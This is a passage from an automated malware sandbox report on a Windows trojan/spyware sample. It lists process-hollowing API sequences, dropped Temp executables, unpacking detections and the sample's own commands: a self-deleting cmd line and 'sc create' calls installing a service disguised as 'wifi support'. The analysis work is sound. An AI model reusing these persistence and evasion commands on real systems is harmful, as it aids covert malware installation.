                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 2_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_00790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 17_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AFF860 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_04AFF940 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: F338.exe.11.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: FFBD.exe.11.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      Source: 3YzgU3S0nW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@47/26@59/15
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041C8AC __vswprintf_c_l,__wremove,_putc,_atexit,_malloc,_realloc,OpenMutexA,GetBinaryTypeA,SetCurrentDirectoryW,Process32FirstW,EnterCriticalSection,QueryDosDeviceA,TerminateJobObject,GlobalAddAtomA,UnlockFile,FreeResource,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeA,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitW,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,FindClose,CancelDeviceWakeupRequest,SignalObjectAndWait,GlobalReAlloc,OpenMutexA,GetLastError,HeapFree,GetComputerNameW,OpenMutexA,TlsAlloc,LoadLibraryW,GetConsoleScreenBufferInfo,FreeEnvironmentStringsA,GetWriteWatch,GetDevicePowerState,TransactNamedPipe,GetConsoleAliasExesLengthA,GetConsoleAliasA,GetConsoleCP,LockFileEx,VerLanguageNameA,lstrcpyA,SetFileShortNameW,GetThreadLocale,CreateSemaphoreA,CreateIoCompletionPort,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,FindResourceExW,CreateIoCompletionPort,CreateSemaphoreA,SetTapeParameters,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExA,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceA,LocalFileTimeToFileTime,InterlockedExchange,SetMailslotInfo,CreateActCtxA,lstrcatW,GetCurrentThreadId,TerminateProcess,GetSystemWow64DirectoryA,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,GetStringTypeExA,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\3YzgU3S0nW.exe "C:\Users\user\Desktop\3YzgU3S0nW.exe"
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeProcess created: C:\Users\user\Desktop\3YzgU3S0nW.exe "C:\Users\user\Desktop\3YzgU3S0nW.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ahtdegs C:\Users\user\AppData\Roaming\ahtdegs
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7085.exe C:\Users\user\AppData\Local\Temp\7085.exe
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeProcess created: C:\Users\user\AppData\Local\Temp\7085.exe C:\Users\user\AppData\Local\Temp\7085.exe
                      Source: C:\Users\user\AppData\Roaming\ahtdegsProcess created: C:\Users\user\AppData\Roaming\ahtdegs C:\Users\user\AppData\Roaming\ahtdegs
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8132.exe C:\Users\user\AppData\Local\Temp\8132.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8A8A.exe C:\Users\user\AppData\Local\Temp\8A8A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\tfktmtml\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" description tfktmtml "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeProcess created: C:\Users\user\Desktop\3YzgU3S0nW.exe "C:\Users\user\Desktop\3YzgU3S0nW.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7085.exe C:\Users\user\AppData\Local\Temp\7085.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8132.exe C:\Users\user\AppData\Local\Temp\8132.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8A8A.exe C:\Users\user\AppData\Local\Temp\8A8A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Users\user\AppData\Roaming\ahtdegsProcess created: C:\Users\user\AppData\Roaming\ahtdegs C:\Users\user\AppData\Roaming\ahtdegs
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeProcess created: C:\Users\user\AppData\Local\Temp\7085.exe C:\Users\user\AppData\Local\Temp\7085.exe
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7085.tmpJump to behavior
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041C66F GetTickCount,FreeUserPhysicalPages,GetCalendarInfoA,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,GlobalMemoryStatus,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntA,SetPriorityClass,
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: sqlite3.dll.22.dr, sqlite3[1].dll.22.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4292:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_01
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: Ras
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: buvamisom
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: mirel
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: \H
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: nacafiretu
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCommand line argument: Kilolonuhu
                      Source: 9355.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9355.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.2.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.2.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.9355.exe.f0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 3YzgU3S0nW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\nanu\zopesagofolux\sufok-bududik\ti.pdb source: 3YzgU3S0nW.exe, ahtdegs.11.dr, 7085.exe.11.dr
                      Source: Binary string: C:\micat\xi.pdb source: 8132.exe, 00000016.00000000.396000995.0000000000401000.00000020.00020000.sdmp, 8132.exe.11.dr
                      Source: Binary string: C:\wapegise51 ricejuvosara\botudi malofinozataci\nad41\jotevut.pdb source: F338.exe.11.dr
                      Source: Binary string: C:\hevetuzovuxa.pdb source: 8A8A.exe, 00000017.00000000.402772293.0000000000401000.00000020.00020000.sdmp, 8A8A.exe, 00000017.00000002.444702730.0000000000A92000.00000004.00000001.sdmp, atingifo.exe.23.dr, 8A8A.exe.11.dr
                      Source: Binary string: HC:\hevetuzovuxa.pdb source: 8A8A.exe, 00000017.00000000.402772293.0000000000401000.00000020.00020000.sdmp, 8A8A.exe, 00000017.00000002.444702730.0000000000A92000.00000004.00000001.sdmp, atingifo.exe.23.dr, 8A8A.exe.11.dr
                      Source: Binary string: .C:\wapegise51 ricejuvosara\botudi malofinozataci\nad41\jotevut.pdb source: F338.exe.11.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeUnpacked PE file: 22.2.8132.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeUnpacked PE file: 23.2.8A8A.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeUnpacked PE file: 22.2.8132.exe.400000.0.unpack .text:ER;.data:W;.cixi:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeUnpacked PE file: 23.2.8A8A.exe.400000.0.unpack .text:ER;.data:W;.vupa:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 9355.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 24.0.9355.exe.f0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 24.0.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 24.0.9355.exe.f0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 24.2.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 24.0.9355.exe.f0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 35.0.9355.exe.80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 35.2.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 35.0.9355.exe.80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 35.0.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 35.0.9355.exe.80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 43.0.9355.exe.c50000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 43.2.9355.exe.c50000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_00424328 push eax; ret
